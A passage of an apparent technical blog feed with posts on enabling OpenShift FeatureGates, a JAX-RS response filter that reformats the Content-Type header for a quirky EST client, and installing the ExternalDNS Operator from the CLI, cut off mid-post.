<span id="cb2-8"><a href="#cb2-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">enabled</span><span class="kw">:</span></span>
<span id="cb2-9"><a href="#cb2-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> UserNamespacesStatelessPodsSupport</span></span></code></pre></div>
<h2 id="applying-featuregate-changes">Applying <code>FeatureGate</code> changes <a href="#applying-featuregate-changes" class="section">§</a></h2>
<p>When you change <code>FeatureGate/cluster</code>, new <code>MachineConfig</code> objects
get generated containing updated configurations of the relevant
Kubernetes and OpenShift components (e.g. <em>kubelet</em>). Machine
Config Operator will progressively update and restart the nodes in
the cluster, while ensuring availability.</p>
<p>Let’s see an example. First, observe that all <code>MachineConfigPool</code>s
are up to date (<code>ready</code> count = machine <code>count</code>):</p>
<pre class="shell"><code>% oc get MachineConfigPool -o json | jq --compact-output \
    &#39;.items[] | { name: .metadata.name \
                , count: .status.machineCount \
                , ready: .status.readyMachineCount}&#39;
{&quot;name&quot;:&quot;master&quot;,&quot;count&quot;:3,&quot;ready&quot;:3}
{&quot;name&quot;:&quot;worker&quot;,&quot;count&quot;:3,&quot;ready&quot;:3}</code></pre>
<p>Also observe that the <code>FeatureGate/cluster</code> object does exist, but
its spec is empty (so the default feature gate settings are used):</p>
<pre class="shell"><code>% oc get -o json FeatureGate/cluster | jq .spec
{}</code></pre>
<p>Now update the <code>FeatureGate/cluster</code> object. Assume the
<code>CustomNoUpgrade</code> configuration shown earlier resides in a file
named <code>featuregate-userns.yaml</code>.</p>
<pre class="shell"><code>% oc replace -f featuregate-userns.yaml
featuregate.config.openshift.io/cluster replaced</code></pre>
<p>After a few moments, Machine Config Operator will observe the new
configuration and start updating and restarting the nodes.
Initially, all pools have zero machines in state <code>ready</code> (because
they all need updating):</p>
<pre class="shell"><code>% oc get MachineConfigPool -o json | jq --compact-output \
    &#39;.items[] | { name: .metadata.name \
                , count: .status.machineCount \
                , ready: .status.readyMachineCount}&#39;
{&quot;name&quot;:&quot;master&quot;,&quot;count&quot;:3,&quot;ready&quot;:0}
{&quot;name&quot;:&quot;worker&quot;,&quot;count&quot;:3,&quot;ready&quot;:0}</code></pre>
<p>After some period of time (which will vary by cluster size), all the
nodes will have received the updated configuration and restarted.</p>
<p>As for verifying that the updates were applied correctly, that will
depend on which gates are being enabled or disabled. It is out of
scope for this article. But in terms of <em>how</em> to set feature flags
in OpenShift, I hope that this article has conveyed it clearly and
that it will be useful to others.</p>
<p>For further detail, see the official OpenShift <a href="https://docs.openshift.com/container-platform/4.12/nodes/clusters/nodes-cluster-enabling-features.html"><code>FeatureGate</code>
documentation</a> and <a href="https://docs.openshift.com/container-platform/4.12/rest_api/config_apis/featuregate-config-openshift-io-v1.html"><code>FeatureGate</code> object
schema</a>.</p>]]></summary>
</entry>
<entry>
    <title>Controlling header formatting in JAX-RS applications</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2022-08-29-jax-rs-header-formatting.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2022-08-29-jax-rs-header-formatting.html</id>
    <published>2022-08-29T00:00:00Z</published>
    <updated>2022-08-29T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="controlling-header-formatting-in-jax-rs-applications">Controlling header formatting in JAX-RS applications</h1>
<p>I’m been implementing an <a href="https://www.rfc-editor.org/rfc/rfc7030"><em>Enrollment over Secure Transport
(EST)</em></a> service in Dogtag PKI. During testing, I found
that a notable client implementation parses the response
<code>Content-Type</code> header in the following way:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="op">(!</span>strncmp<span class="op">(</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>    multipart_get_data_content_type<span class="op">(</span>parser<span class="op">),</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;application/pkcs7-mime; smime-type=certs-only&quot;</span><span class="op">,</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>    <span class="dv">45</span><span class="op">)</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>  <span class="op">)</span> <span class="op">{</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>    <span class="op">...</span></span></code></pre></div>
<p>The Dogtag EST service is a <a href="https://projects.eclipse.org/projects/ee4j.rest"><em>Jakarta RESTful Web Services
(JAX-RS)</em></a> application. It produces a <code>Content-Type</code> header
value different from what the client expects (note the lack of
whitespace):</p>
<pre><code>application/pkcs7-mime;smime-type=certs-only</code></pre>
<p>As a consequence, the EST client fails to process the response.
This is certainly a defect in the EST client implementation. But
EST is used by many embedded or hard to update network devices. Or
updates might not be available (now, <em>ever?</em>)</p>
<p>So, I needed to find a way to override the header default header
formatting. This blog post describes my solution.</p>
<h2 id="specifying-the-content-type-header">Specifying the <code>Content-Type</code> header <a href="#specifying-the-content-type-header" class="section">§</a></h2>
<p>The JAX-RS <code>@Produces</code> annotation specifies the <code>Content-Type</code>
header value for a particular resource:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="at">@POST</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="at">@Path</span><span class="op">(</span><span class="st">&quot;simpleenroll&quot;</span><span class="op">)</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="at">@Consumes</span><span class="op">(</span><span class="st">&quot;application/pkcs10&quot;</span><span class="op">)</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="at">@Produces</span><span class="op">(</span><span class="st">&quot;application/pkcs7-mime; smime-type=certs-only&quot;</span><span class="op">)</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="bu">Response</span> <span class="fu">simpleenroll</span><span class="op">(</span><span class="dt">byte</span><span class="op">[]</span> data<span class="op">)</span> <span class="op">{</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a>    <span class="kw">...</span></span></code></pre></div>
<p>Note that the string value is not used <em>verbatim</em>. Instead, it is
parsed into a <a href="https://docs.oracle.com/javaee/7/api/javax/ws/rs/core/MediaType.html"><code>MediaType</code></a> value and stored as such in
the response headers (a <code>MultivaluedMap&lt;String, Object&gt;</code>).</p>
<p>When serialising the <code>Response</code>, header values are stringified via
types that implement the
<a href="https://docs.oracle.com/javaee/7/api/javax/ws/rs/ext/RuntimeDelegate.HeaderDelegate.html"><code>RuntimeDelegate.HeaderDelegate&lt;T&gt;</code></a> interface,
where <code>T</code> is the real type of the header value <code>Object</code>. To
serialise a <code>MediaType</code> header value, the JAX-RS machinery uses a
instance of a a class that implements
<code>RuntimeDelegate.HeaderDelegate&lt;MediaType&gt;</code>.</p>
<p><code>HeaderDelegate</code> <em>implementations</em> are not part of the JAX-RS API.
They are provided by the JAX-RS implementation. In Dogtag PKI,
that’s <a href="https://resteasy.dev/">RESTEasy</a>. The class in question is:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="kw">class</span> MediaTypeHeaderDelegate</span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a>  <span class="kw">implements</span> RuntimeDelegate<span class="op">.</span><span class="fu">HeaderDelegate</span><span class="op">&lt;</span>MediaType<span class="op">&gt;</span> <span class="op">{</span></span></code></pre></div>
<p>The <code>toString(MediaType type)</code> method provided by this class prints
the value without a space character between the subtype and the
parameters. For the example resource above, it produces the string:</p>
<pre><code>application/pkcs7-mime;smime-type=certs-only</code></pre>
<p>This is a legal production in the HTTP grammar, according to <a href="https://www.rfc-editor.org/rfc/rfc7230#section-3.2.3">RFC
7230</a> and <a href="https://www.rfc-editor.org/rfc/rfc7231#section-3.1.1.1">RFC 7231</a>:</p>
<pre><code>media-type = type &quot;/&quot; subtype *( OWS &quot;;&quot; OWS parameter )
OWS = *( SP / HTAB )</code></pre>
<p>However, we already saw that at least one EST client is unable to
process this value, because it expects a space character before the
parameters:</p>
<pre><code>application/pkcs7-mime; smime-type=certs-only</code></pre>
<p>This is also a legal production. But the client is using <code>strncmp</code>
to look for this exact string, instead of properly parsing the
value. If we can’t fix the client behaviour, we have to find a
workaround on the server to produce the exact string the client
expects.</p>
<h2 id="idea-1-custom-headerdelegate">Idea 1: custom <code>HeaderDelegate</code> <a href="#idea-1-custom-headerdelegate" class="section">§</a></h2>
<p>My first idea was to override the <code>HeaderDelegate&lt;MediaType&gt;</code> with
our own implementation. I couldn’t find a general way to do that
via the JAX-RS API. It does seem that you can do it using RESTEasy
classes directly:</p>
<ol type="1">
<li>Implement the custom <code>HeaderDelegate&lt;MediaType&gt;</code>. To avoid
unnecessary work you could extend RESTEasy’s
<code>MediaTypeHeaderDelegate</code> and override just the
<code>toString(MediaType)</code> method.</li>
<li>Obtain <code>ResteasyProviderFactory.getInstance()</code>. Invoke
<code>.addHeaderDelegate(MediaType.class, customInst)</code> to replace the
<code>HeaderDelegate&lt;MediaType&gt;</code>.</li>
</ol>
<p>This approach has several disadvantages:</p>
<ul>
<li>Directly coupled to the RESTEasy implementation. May break if
RESTEasy implementation details change and will not work with
other JAX-RS implementations.</li>
<li>Need to implement a custom <code>HeaderDelegate&lt;MediaType&gt;</code> with the
“correct” serialisation behaviour.</li>
<li><strong>The “correct” serialisation behaviour might break <em>other</em> clients
with different bugs/quirks.</strong></li>
</ul>
<p>For these reasons I rejected the first idea and sought an approach
that avoids these disadvantages.</p>
<h2 id="idea-2-response-filter">Idea 2: response filter <a href="#idea-2-response-filter" class="section">§</a></h2>
<p>My next idea was to use a <em>response filter</em> to reformat the
<code>Content-Type</code> response header. The Servlet API defines the
<a href="https://docs.oracle.com/javaee/7/api/javax/ws/rs/container/ContainerResponseFilter.html"><code>ContainerResponseFilter</code></a> interface:</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="kw">interface</span> ContainerResponseFilter <span class="op">{</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a>  <span class="dt">void</span> <span class="fu">filter</span><span class="op">(</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a>      ContainerRequestContext requestContext<span class="op">,</span></span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a>      ContainerResponseContext responseContext<span class="op">)</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a>    <span class="kw">throws</span> <span class="bu">IOException</span></span>
<span id="cb8-6"><a href="#cb8-6" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>The application applies each registered filter to each response,
before serialising and sending the response. At the time response
filters are applied, the <code>Content-Type</code> header value is a
<code>MediaType</code>. It has not yet been converted to a <code>String</code>.</p>
<p>A response filter can add, remove, or replace response headers.
Recall that headers are stored in a <code>MultivaluedMap&lt;String, Object&gt;</code>. This means that we can replace a <code>MediaType</code> value (whose
serialisation is determined by the <code>HeaderDelegate</code>) with a <code>String</code>
value (which will be written <em>as is</em>).</p>
<p>The <code>.equals</code> equality test for <code>MediaType</code> properly compares the
properties of the instance without regard to string representation.
As it should. This enables a succinct implementation where we:</p>
<ol type="1">
<li>Decalre <em>verbatim</em> <code>String</code> header values we want to see in the
response.</li>
<li>Parse those strings into <code>MediaType</code> values.</li>
<li>Match the <code>Content-Type</code> value in the response against parsed
values.</li>
<li>Replace matched header values with the corresponding <em>verbatim</em>
<code>String</code>.</li>
</ol>
<p>The implementation is straightforward:</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="at">@Provider</span></span>
<span id="cb9-2"><a href="#cb9-2" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="kw">class</span> ReformatContentTypeResponseFilter</span>
<span id="cb9-3"><a href="#cb9-3" aria-hidden="true" tabindex="-1"></a>    <span class="kw">implements</span> ContainerResponseFilter <span class="op">{</span></span>
<span id="cb9-4"><a href="#cb9-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-5"><a href="#cb9-5" aria-hidden="true" tabindex="-1"></a>  <span class="kw">private</span> <span class="dt">static</span> <span class="bu">String</span><span class="op">[]</span> verbatim <span class="op">=</span> <span class="op">{</span></span>
<span id="cb9-6"><a href="#cb9-6" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;application/pkcs7-mime; smime-type=certs-only&quot;</span></span>
<span id="cb9-7"><a href="#cb9-7" aria-hidden="true" tabindex="-1"></a>  <span class="op">};</span></span>
<span id="cb9-8"><a href="#cb9-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-9"><a href="#cb9-9" aria-hidden="true" tabindex="-1"></a>  <span class="kw">private</span> <span class="dt">static</span> <span class="bu">HashMap</span><span class="op">&lt;</span>MediaType<span class="op">,</span> <span class="bu">String</span><span class="op">&gt;</span> substitutions <span class="op">=</span></span>
<span id="cb9-10"><a href="#cb9-10" aria-hidden="true" tabindex="-1"></a>    <span class="kw">new</span> <span class="bu">HashMap</span><span class="op">&lt;&gt;();</span></span>
<span id="cb9-11"><a href="#cb9-11" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-12"><a href="#cb9-12" aria-hidden="true" tabindex="-1"></a>  <span class="dt">static</span> <span class="op">{</span></span>
<span id="cb9-13"><a href="#cb9-13" aria-hidden="true" tabindex="-1"></a>    <span class="cf">for</span> <span class="op">(</span><span class="bu">String</span> s <span class="op">:</span> verbatim<span class="op">)</span></span>
<span id="cb9-14"><a href="#cb9-14" aria-hidden="true" tabindex="-1"></a>      substitutions<span class="op">.</span><span class="fu">put</span><span class="op">(</span>MediaType<span class="op">.</span><span class="fu">valueOf</span><span class="op">(</span>s<span class="op">),</span> s<span class="op">);</span></span>
<span id="cb9-15"><a href="#cb9-15" aria-hidden="true" tabindex="-1"></a>  <span class="op">}</span></span>
<span id="cb9-16"><a href="#cb9-16" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-17"><a href="#cb9-17" aria-hidden="true" tabindex="-1"></a>  <span class="at">@Override</span></span>
<span id="cb9-18"><a href="#cb9-18" aria-hidden="true" tabindex="-1"></a>  <span class="kw">public</span> <span class="dt">void</span> <span class="fu">filter</span><span class="op">(</span></span>
<span id="cb9-19"><a href="#cb9-19" aria-hidden="true" tabindex="-1"></a>      ContainerRequestContext requestContext<span class="op">,</span></span>
<span id="cb9-20"><a href="#cb9-20" aria-hidden="true" tabindex="-1"></a>      ContainerResponseContext responseContext<span class="op">)</span> <span class="op">{</span></span>
<span id="cb9-21"><a href="#cb9-21" aria-hidden="true" tabindex="-1"></a>    MultivaluedMap<span class="op">&lt;</span><span class="bu">String</span><span class="op">,</span> <span class="bu">Object</span><span class="op">&gt;</span> headers <span class="op">=</span></span>
<span id="cb9-22"><a href="#cb9-22" aria-hidden="true" tabindex="-1"></a>      responseContext<span class="op">.</span><span class="fu">getHeaders</span><span class="op">()</span></span>
<span id="cb9-23"><a href="#cb9-23" aria-hidden="true" tabindex="-1"></a>    <span class="bu">Object</span> v <span class="op">=</span> headers<span class="op">.</span><span class="fu">getFirst</span><span class="op">(</span>HttpHeaders<span class="op">.</span><span class="fu">CONTENT_TYPE</span><span class="op">);</span></span>
<span id="cb9-24"><a href="#cb9-24" aria-hidden="true" tabindex="-1"></a>    <span class="cf">if</span> <span class="op">(</span>v <span class="op">!=</span> <span class="kw">null</span> <span class="op">&amp;&amp;</span> v <span class="kw">instanceof</span> MediaType</span>
<span id="cb9-25"><a href="#cb9-25" aria-hidden="true" tabindex="-1"></a>        <span class="op">&amp;&amp;</span> substitutions<span class="op">.</span><span class="fu">containsKey</span><span class="op">(</span>v<span class="op">))</span> <span class="op">{</span></span>
<span id="cb9-26"><a href="#cb9-26" aria-hidden="true" tabindex="-1"></a>      headers<span class="op">.</span><span class="fu">putSingle</span><span class="op">(</span></span>
<span id="cb9-27"><a href="#cb9-27" aria-hidden="true" tabindex="-1"></a>        HttpHeaders<span class="op">.</span><span class="fu">CONTENT_TYPE</span><span class="op">,</span> substitutions<span class="op">.</span><span class="fu">get</span><span class="op">(</span>v<span class="op">));</span></span>
<span id="cb9-28"><a href="#cb9-28" aria-hidden="true" tabindex="-1"></a>    <span class="op">}</span></span>
<span id="cb9-29"><a href="#cb9-29" aria-hidden="true" tabindex="-1"></a>  <span class="op">}</span></span>
<span id="cb9-30"><a href="#cb9-30" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-31"><a href="#cb9-31" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>There is currently only one header value whose formatting I need to
precisely control. If we discover more, we only need to add the
desired string serialisation to the <code>verbatim</code> array.</p>
<p>We must consider the possible scenario of different clients with
different quirks. In that case, we could maintain separate
substitutions maps for each known problematic client. We would use
the <code>User-Agent</code> header, or other request characteristics, to
identify the client and select the corresponding substitution map
(if any). Hopefully this situation does not arise. But if it does,
the increase in complexity of the solution is tolerable.</p>
<p>This solution works well and avoids the disadvantages of my first
idea:</p>
<ul>
<li>Only uses official Servlet and JAX-RS classes and interfaces.
This solution will work across all JAX-RS implementations.</li>
<li>Does not (re)implement <code>MediaType</code> serialsation. You just declare
the exact string values you want to see in responses.</li>
<li>With a moderate increase in complexity, can handle different
clients with incompatible quriks.</li>
</ul>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="section">§</a></h2>
<p>It’s unfortunate that this workaround was even necessary. But given
that it was, I’m happy with the solution. It is simple and portable
across Servlet and JAX-RS implementations.</p>
<p>The same approach could be used for controlling formatting of any
header value types, not just <code>Content-Type</code> / <code>MediaType</code>. I hope
that sharing this solution will help people who encounter similar
problems. At the very least, I hope that because of this post you
learned something about Servlet and JAX-RS response header
processing.</p>]]></summary>
</entry>
<entry>
    <title>Experimenting with ExternalDNS</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2022-03-24-k8s-external-dns.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2022-03-24-k8s-external-dns.html</id>
    <published>2022-03-24T00:00:00Z</published>
    <updated>2022-03-24T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="experimenting-with-externaldns">Experimenting with ExternalDNS</h1>
<p>DNS is a critical piece of the puzzle for exposing Kubernetes-hosted
applications to the Internet. Running the application means nothing
if you can’t get traffic to it. Keeping public DNS records in sync
with the deployed applications is important. The Kubernetes
<a href="https://github.com/kubernetes-sigs/external-dns">ExternalDNS</a> was developed for this purpose.</p>
<p>ExternalDNS exposes Kubernetes Services and Routes in by managing
records in external DNS providers. It <a href="https://github.com/kubernetes-sigs/external-dns/blob/570b51659fdc218281e3504a558a437178465f29/README.md#status-of-providers">supports many DNS
providers</a>, including the DNS services of the popular
cloud providers (AWS, Google Cloud, Azure, …).</p>
<p>I have been experimenting with ExternalDNS. My purpose is not only
to understand installation and basic usage, but also whether it can
meet the specific DNS requirements of FreeIPA, such as <code>SRV</code>
records. This post outlines my findings.</p>
<h2 id="operator-installation">Operator installation <a href="#operator-installation" class="section">§</a></h2>
<p>The <a href="https://github.com/kubernetes-sigs/external-dns">ExternalDNS</a> controller is a Kubernetes sub-project (or
SIG—<em>special interest group</em>). In the OpenShift ecosystem, the
<a href="https://github.com/openshift/external-dns-operator">ExternalDNS Operator</a> creates and manages ExternalDNS controller
instances defined by <em>custom resources</em> (CRs) of <code>kind: ExternalDNS</code>.</p>
<p>The ExternalDNS Operator is available as a <em>Tech Preview</em> in
OpenShift Container Platform 4.10. So, it is visible in the
<em>OperatorHub</em> catalogue out-of-the-box. The <a href="https://docs.openshift.com/container-platform/4.10/networking/external_dns_operator/nw-installing-external-dns-operator.html">official docs</a>
explain how to install the operator via the OperatorHub web console.
The instructions were easy to follow.</p>
<p>I prefer using the CLI where possible. The OperatorHub system is
complex but I eventually worked out what commands and objects are
needed to install the ExternalDNS Operator from the CLI.</p>
<p>First, create the <em>operand</em> namespaces and RBAC objects. The
operand namespace is where the ExternalDNS controllers (as opposed
to the ExternalDNS <em>Operator</em> controller) will live.</p>
<pre class="shell"><code>$ oc create ns external-dns
namespace/external-dns created

$ oc apply -f \
    https://raw.githubusercontent.com/openshift/external-dns-operator/release-0.1/config/rbac/extra-roles.yaml
role.rbac.authorization.k8s.io/external-dns-operator created
rolebinding.rbac.authorization.k8s.io/external-dns-operator created
clusterrole.rbac.authorization.k8s.io/external-dns created
clusterrolebinding.rbac.authorization.k8s.io/external-dns created</code></pre>
<p>Next, create the <code>external-dns-operator</code> namespace where the
operator itself shall live:</p>
<pre class="shell"><code>% oc create ns external-dns-operator
namespace/external-dns-operator created</code></pre>
<p>Finally create the OperatorGroup and OperatorHub Subscription
objects. Note the contents of <code>external-dns-operator.yaml</code>:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> operators.coreos.com/v1</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> OperatorGroup</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">generateName</span><span class="kw">:</span><span class="at"> external-dns-operator-</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">namespace</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb3-7"><a href="#cb3-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">targetNamespaces</span><span class="kw">:</span></span>
<span id="cb3-8"><a href="#cb3-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-9"><a href="#cb3-9" aria-hidden="true" tabindex="-1"></a><span class="pp">---</span></span>
<span id="cb3-10"><a href="#cb3-10" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> operators.coreos.com/v1alpha1</span></span>
<span id="cb3-11"><a href="#cb3-11" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Subscription</span></span>
<span id="cb3-12"><a href="#cb3-12" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb3-13"><a href="#cb3-13" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-14"><a href="#cb3-14" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">namespace</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-15"><a href="#cb3-15" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb3-16"><a href="#cb3-16" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-17"><a href="#cb3-17" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">source</span><span class="kw">:</span><span class="at"> redhat-operators</span></span>
<span id="cb3-18"><a href="#cb3-18" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">sourceNamespace</span><span class="kw">:</span><span class="at"> openshift-marketplace</span></span></code></pre></div>
<p>Create the objects:</p>
<pre class="shell"><code>% oc create -f external-dns-operator.yaml
operatorgroup.operators.coreos.com/external-dns-operator-8852w created
subscription.operators.coreos.com/external-dns-operator created</code></pre>
<p>After a short delay (~1 minute for me) the operator installation
should finish. Observe the various Kubernetes objects that
represent the running operator:</p>
<pre class="shell"><code>% oc get -n external-dns-operator all
NAME                                         READY   STATUS    RESTARTS      AGE
pod/external-dns-operator-594b465984-r2pc5   2/2     Running   2 (59s ago)   5m13s

NAME                                            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE
service/external-dns-operator-metrics-service   ClusterIP   172.30.151.142   &lt;none&gt;        8443/TCP   5m15s
service/external-dns-operator-service           ClusterIP   172.30.210.21    &lt;none&gt;        9443/TCP   59s

NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/external-dns-operator   1/1     1            1           5m14s

NAME                                               DESIRED   CURRENT   READY   AGE
replicaset.apps/external-dns-operator-594b465984   1         1         1       5m15s</code></pre>
<h2 id="the-externaldns-custom-resource">The <code>ExternalDNS</code> custom resource <a href="#the-externaldns-custom-resource" class="section">§</a></h2>
<p>Now that the operator is installed, we can define an <code>ExternalDNS</code>
customer resource (CR). The operator creates an ExternalDNS
controller instance for each CR. Here is an example
(<code>externaldns-test.yaml</code>):</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> externaldns.olm.openshift.io/v1alpha1</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> ExternalDNS</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> test</span></span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">domains</span><span class="kw">:</span></span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> </span><span class="fu">filterType</span><span class="kw">:</span><span class="at"> Include </span></span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">matchType</span><span class="kw">:</span><span class="at"> Exact </span></span>
<span id="cb6-9"><a href="#cb6-9" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">name</span><span class="kw">:</span><span class="at"> ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com</span></span>
<span id="cb6-10"><a href="#cb6-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">provider</span><span class="kw">:</span></span>
<span id="cb6-11"><a href="#cb6-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">type</span><span class="kw">:</span><span class="at"> GCP</span></span>
<span id="cb6-12"><a href="#cb6-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">source</span><span class="kw">:</span></span>
<span id="cb6-13"><a href="#cb6-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">type</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb6-14"><a href="#cb6-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">service</span><span class="kw">:</span></span>
<span id="cb6-15"><a href="#cb6-15" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">serviceType</span><span class="kw">:</span></span>
<span id="cb6-16"><a href="#cb6-16" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> LoadBalancer</span></span>
<span id="cb6-17"><a href="#cb6-17" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">labelFilter</span><span class="kw">:</span></span>
<span id="cb6-18"><a href="#cb6-18" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">matchLabels</span><span class="kw">:</span></span>
<span id="cb6-19"><a href="#cb6-19" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb6-20"><a href="#cb6-20" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">fqdnTemplate</span><span class="kw">:</span></span>
<span id="cb6-21"><a href="#cb6-21" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="st">&quot;{{.Name}}.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com&quot;</span></span></code></pre></div>
<p>Breaking down the <code>spec</code>, we see the following fields:</p>
<ul>
<li><p><strong><code>domains</code></strong> gives a rule for which domains this <code>ExternalDNS</code>
controller must manage. In this case, any domain name with a
<em>suffix</em> matching the <code>name</code> subfield will match the rule.</p></li>
<li><p><strong><code>provider</code></strong> specifies the cloud provider—in this case GCP
(Google Cloud). For GCP there is nothing else to configure; the
